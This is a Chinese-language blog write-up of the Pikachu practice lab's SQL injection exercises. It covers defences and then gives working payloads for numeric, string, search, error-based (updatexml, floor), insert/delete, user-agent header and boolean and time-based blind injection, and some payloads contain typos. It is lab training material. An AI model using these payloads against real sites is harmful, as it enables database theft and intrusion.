pikachu--SQL注入

Sql注入

 数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄露的一种漏洞。

Sql注入攻击流程

1.  注入点探测

自动方式:使用web漏洞扫描工具,自动进行注入点发现

手动方式:手工构造sql inject测试语句进行注入点发现

2.  信息获取

通过注入点取得期望得到的数据

      1.  环境信息:数据库类型,数据库版本,操作系统版本,用户信息等

      2.  数据库信息:数据库名称,数据库表,表字段,字段内容(加密内容破解)

      3.  获取权限       获取操作系统权限:通过数据库执行shell,上传木马

 

Get方式中使用url提交注入数据;post方式中使用抓包工具修改post数据部分提交注入

注入方法可以参照之前做sqli-labs实验的方法:https://www.cnblogs.com/7-58/p/12286731.html

 

防范措施

代码层面:

  1. 1.  对输入进行严格的转义和过滤(mysqli_real_escape_string)
  2. 2.  使用预处理和参数化(parameterized)

 

 

 

网络层面:

  1. 1.  通过WAF设备启用sql inject注入策略(类似防护系统)
  2. 2.  云端防护(360网站卫士,阿里云)

 

 

SQL数字型注入(post)

 

 

 

提交  抓包发送到repeater里  修改id后面给他增加sql语句

 

 

 

 

可以看到增加or 1=1之后,就把id全都列出来了

 

 

 

可以看一下源码   这里直接post请求直接把id带入到sql语句中,没有做任何处理,所以在id这里存在sql注入漏洞

 

 

 

SQL字符型注入(get)

kobe' or 1=1#'

 这里输入kobe 只出现这个

 

 

 

因为是字符型的注入,我们可以使用做sqli-labs方法进行尝试,加单引号、双引号、括号、以及他们的组合,这里需要注意闭合后面注释

 

 

 

SQL搜索型注入

实际上sql语句是 select username,id,email from member where username like '%$name%'

用了一个like  ‘%xxxx%’

所以我们可以用 xxx%’ or 1=1#

 

 

 成功闭合,将所有用户信息拿出

 

 

 

 

SQL xx型注入

Sql语句为:select id,email from member where username=('$name')

相同的道理闭合:xx’) or 1=1#

 

 

 

Insert/updata注入(使用报错注入)

Sql语句:insert into member(username,pw,sex,phonenum,email,address)values(‘xx’,11,1,2,3,4);

基于insert下的报错

Gxy’or updatexml(1,concat(0x7e,database()),0)or ‘

基于delete下的报错

1 or updatexml(1,concat(0x7e,database()),0)

基于floor()

Kobe’ and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema,tables group by x)a)#

 

构造语句:

insert into member(username,pw,sex,phonenum,email,address)values(‘1’or updatexml(1,concat(0x7e,database()),0) or ’’ ,11,1,2,3,4);

 

 

 

出来报错

 

 

 

Delete注入

删除一个留言  抓包 发送给到repeater 

 

 

通过看源码id是一个数字型

 

 

在repeater里面修改id  并转码

 

 

 

 

在右边的界面拉到最后就会有报错信息的显示

 

 

http头注入

有时候后台开发人员为了验证客户信息(比如cookie验证)或者通过http header头信息获取客户端的一些信息,比如useragent、accept字段等 会对客户端的http header信息进行获取并使用sql进行处理,如果此时没有足够的安全考虑则可能会导致基于http header 的sql inject漏洞。

登录 admin 123456

 

 

抓包 发送到repeater  修改user-agent 在右边最下面会显示出信息

firefox’or updatexml(1,concat(0x7e,database()),0)or ‘

 

 

 

 

盲注

基于boolean盲注

表现:

1.没有报错信息

2.结果都只显示两种情况(0或1)

3.在正确的输入下,输入and 1=1/and 1=2可以判断

 

<实际上你要自己一个一个的去测>

输入   Kobe’ and ascii(substr(database(),1,1))>113#

 

kobe' and ascii(substr(database(),1,1,))=112#       正确输出

 

 

将database()换成

select table_name from information_schema.tables where table_schema=database() limit 0, 1

 

kobe' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0, 1)

,1,1,))>112#   这样构造还是可以的

 

基于时间的盲注

Kobe’ and sleep(5)#   页面会停顿5秒

 

 

 通过这个可以判断构造语句是否正确

Kobe’ and if((substr(database(),1,1))=‘a’,sleep(5),null)#

猜测第一个字符是否是a (a-z)

 

 我们可以将database()换成select  table_name from information_schema.tables where table_schema=database() limit 0, 1

都是可以的,需要灵活的掌握sql注入的一些构造语句。

 

posted @ 2020-02-25 10:41  gxy*  阅读(310)  评论(0编辑  收藏  举报